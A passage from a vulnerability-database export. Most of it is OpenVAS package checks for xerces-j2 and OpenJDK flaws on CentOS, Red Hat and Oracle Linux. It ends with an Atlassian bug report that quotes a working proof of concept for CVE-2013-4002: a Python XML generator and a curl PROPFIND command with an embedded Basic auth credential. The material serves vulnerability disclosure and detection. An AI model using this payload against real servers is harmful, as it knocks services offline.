script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1319\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020603.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xerces-j2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-demo\", rpm:\"xerces-j2-demo~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-apis\", rpm:\"xerces-j2-javadoc-apis~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-impl\", rpm:\"xerces-j2-javadoc-impl~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-other\", rpm:\"xerces-j2-javadoc-other~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-xni\", rpm:\"xerces-j2-javadoc-xni~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-scripts\", rpm:\"xerces-j2-scripts~2.7.1~12.7.el6_5\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:28", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310871252", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871252", "title": "RedHat Update for xerces-j2 RHSA-2014:1319-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for xerces-j2 RHSA-2014:1319-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871252\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:21 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"RedHat Update for xerces-j2 RHSA-2014:1319-01\");\n script_tag(name:\"insight\", value:\"Apache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2 packages\nprovide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. Applications using the\nXerces-J must be restarted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"xerces-j2 on Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1319-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00058.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xerces-j2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.11.0~17.el7_0\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.7.1~12.7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-debuginfo\", rpm:\"xerces-j2-debuginfo~2.7.1~12.7.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:53", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310881819", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881819", "title": "CentOS Update for java CESA-2013:1505 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:1505 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881819\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 10:44:42 +0530 (Fri, 08 Nov 2013)\");\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\",\n \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\",\n \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5802\",\n \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\",\n \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\",\n \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5840\", \"CVE-2013-5842\",\n \"CVE-2013-5849\", \"CVE-2013-5850\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for java CESA-2013:1505 centos6\");\n\n script_tag(name:\"affected\", value:\"java on CentOS 6\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasie ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2013:1505\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-November/020019.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:59", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2013-1505", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123534", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123534", "title": "Oracle Linux Local Check: ELSA-2013-1505", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-1505.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123534\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:05:11 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-1505\");\n script_tag(name:\"insight\", value:\"ELSA-2013-1505 - java-1.6.0-openjdk security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-1505\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-1505.html\");\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\", \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\", \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5802\", \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\", \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\", \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5840\", \"CVE-2013-5842\", \"CVE-2013-5849\", \"CVE-2013-5850\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.42.1.11.14.0.1.el5_10\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.65.1.11.14.el6_4\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-11-08T00:00:00", "id": "OPENVAS:1361412562310881822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881822", "title": "CentOS Update for java CESA-2013:1505 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for java CESA-2013:1505 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881822\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 10:49:01 +0530 (Fri, 08 Nov 2013)\");\n script_cve_id(\"CVE-2013-3829\", \"CVE-2013-4002\", \"CVE-2013-5772\", \"CVE-2013-5774\",\n \"CVE-2013-5778\", \"CVE-2013-5780\", \"CVE-2013-5782\", \"CVE-2013-5783\",\n \"CVE-2013-5784\", \"CVE-2013-5790\", \"CVE-2013-5797\", \"CVE-2013-5802\",\n \"CVE-2013-5803\", \"CVE-2013-5804\", \"CVE-2013-5809\", \"CVE-2013-5814\",\n \"CVE-2013-5817\", \"CVE-2013-5820\", \"CVE-2013-5823\", \"CVE-2013-5825\",\n \"CVE-2013-5829\", \"CVE-2013-5830\", \"CVE-2013-5840\", \"CVE-2013-5842\",\n \"CVE-2013-5849\", \"CVE-2013-5850\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"CentOS Update for java CESA-2013:1505 centos5\");\n\n script_tag(name:\"affected\", value:\"java on CentOS 5\");\n script_tag(name:\"insight\", value:\"The java-1.6.0-openjdk packages provide the OpenJDK 6 Java Runtime\nEnvironment and the OpenJDK 6 Java Software Development Kit.\n\nMultiple input checking flaws were found in the 2D component native image\nparsing code. A specially crafted image file could trigger a Java Virtual\nMachine memory corruption and, possibly, lead to arbitrary code execution\nwith the privileges of the user running the Java Virtual Machine.\n(CVE-2013-5782)\n\nThe class loader did not properly check the package access for non-public\nproxy classes. A remote attacker could possibly use this flaw to execute\narbitrary code with the privileges of the user running the Java Virtual\nMachine. (CVE-2013-5830)\n\nMultiple improper permission check issues were discovered in the 2D, CORBA,\nJNDI, and Libraries components in OpenJDK. An untrusted Java application or\napplet could use these flaws to bypass Java sandbox restrictions.\n(CVE-2013-5829, CVE-2013-5814, CVE-2013-5817, CVE-2013-5842, CVE-2013-5850)\n\nMultiple input checking flaws were discovered in the JPEG image reading and\nwriting code in the 2D component. An untrusted Java application or applet\ncould use these flaws to corrupt the Java Virtual Machine memory and bypass\nJava sandbox restrictions. (CVE-2013-5809)\n\nThe FEATURE_SECURE_PROCESSING setting was not properly honored by the\njavax.xml.transform package transformers. A remote attacker could use this\nflaw to supply a crafted XML that would be processed without the intended\nsecurity restrictions. (CVE-2013-5802)\n\nMultiple errors were discovered in the way the JAXP and Security components\nprocesses XML inputs. A remote attacker could create a crafted XML that\nwould cause a Java application to use an excessive amount of CPU and memory\nwhen processed. (CVE-2013-5825, CVE-2013-4002, CVE-2013-5823)\n\nMultiple improper permission check issues were discovered in the Libraries,\nSwing, JAX-WS, JGSS, AWT, Beans, and Scripting components in OpenJDK. An\nuntrusted Java application or applet could use these flaws to bypass\ncertain Java sandbox restrictions. (CVE-2013-3829, CVE-2013-5840,\nCVE-2013-5774, CVE-2013-5783, CVE-2013-5820, CVE-2013-5849, CVE-2013-5790,\nCVE-2013-5784)\n\nIt was discovered that the 2D component image library did not properly\ncheck bounds when performing image conversions. An untrusted Java\napplication or applet could use this flaw to disclose portions of the Java\nVirtual Machine memory. (CVE-2013-5778)\n\nMultiple input sanitization flaws were discovered in javadoc. When javadoc\ndocumentation was generated from an untrusted Java source code and hosted\non a domain not controlled by the code author, these issues could make it\neasie ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2013:1505\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-November/020016.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk\", rpm:\"java-1.6.0-openjdk~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-demo\", rpm:\"java-1.6.0-openjdk-demo~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-devel\", rpm:\"java-1.6.0-openjdk-devel~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-javadoc\", rpm:\"java-1.6.0-openjdk-javadoc~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"java-1.6.0-openjdk-src\", rpm:\"java-1.6.0-openjdk-src~1.6.0.0~1.42.1.11.14.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2017-03-22T18:16:54", "bulletinFamily": "software", "description": "{quote}\r\nThere is WebDav endpoint that is accessible via following URL -\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default . It is possible to pass XML as data for\r\nPROPFIND request.\r\nFollowing python code will generate XML with long pseudo-attribute name that exploits CVE-2013-4002\r\nissue.\r\n{code}\r\n#!/usr/bin/env python\r\nimport os\r\noutdir = raw_input('specify output directory > ')\r\n### XML to exploit CVE-2013-4002\r\nxml = \"<?xml \" + \"\\xe7\\x9a\\x84\"*1000000 + \"='china' version = '1.0'?><a/>\"\r\nwith open(os.path.join(outdir,'cve2013-4002.xml'),'w') as out:\r\nout.write(xml)\r\ndef sizeof(num, suffix='B'):\r\n for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:\r\n if abs(num) < 1024.0:\r\n return \"%3.1f%s%s\" % (num, unit, suffix)\r\n num /= 1024.0\r\n return \"%.1f%s%s\" % (num, 'Yi', suffix)\r\nprint \"[+] File 'cve2013-4002.xml':\", sizeof(len(xml))\r\n{code}\r\nAccording to XML specification there are only three valid pseudo-attributes: version, encoding and\r\nstandalone. When we submit any random pseudo-attribute with long name, secure version of Xerces-J\r\nparser just ignores it. At the same time vulnerable version will try to parse it. This will require much CPU\r\nwork.\r\nIf you try to send this request with curl, you will see that there is no immediate answer from server. You\r\nwill get \u201cGateway Time-out\u201d answer from the server after 4 minutes.\r\n{code}\r\ncurl -X 'PROPFIND' -H 'Depth: 0' -H 'Content-Type: application/xml'\r\n-H 'Authorization: Basic Z3IzM2t3YXJpb3I6c2ExODEyODM5MSE=' --databinary\r\n'@/tmp/cve2013-4002.xml'\r\nhttps://pwnie.ninja/confluence/plugins/servlet/confluence/default\r\n{code}\r\n{quote}", "modified": "2016-07-20T02:41:44", "published": "2015-06-19T06:43:36", "href": "https://jira.atlassian.com/browse/CONF-37991", "id": "ATLASSIAN:CONF-37991", "title": "Denial of Service attack through vulnerable Xerces-J library", "type": "atlassian", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-12-05T05:47:36", "bulletinFamily": "software", "description": "{quote}\r\nThere is WebDav endpoint that is accessible via following URL 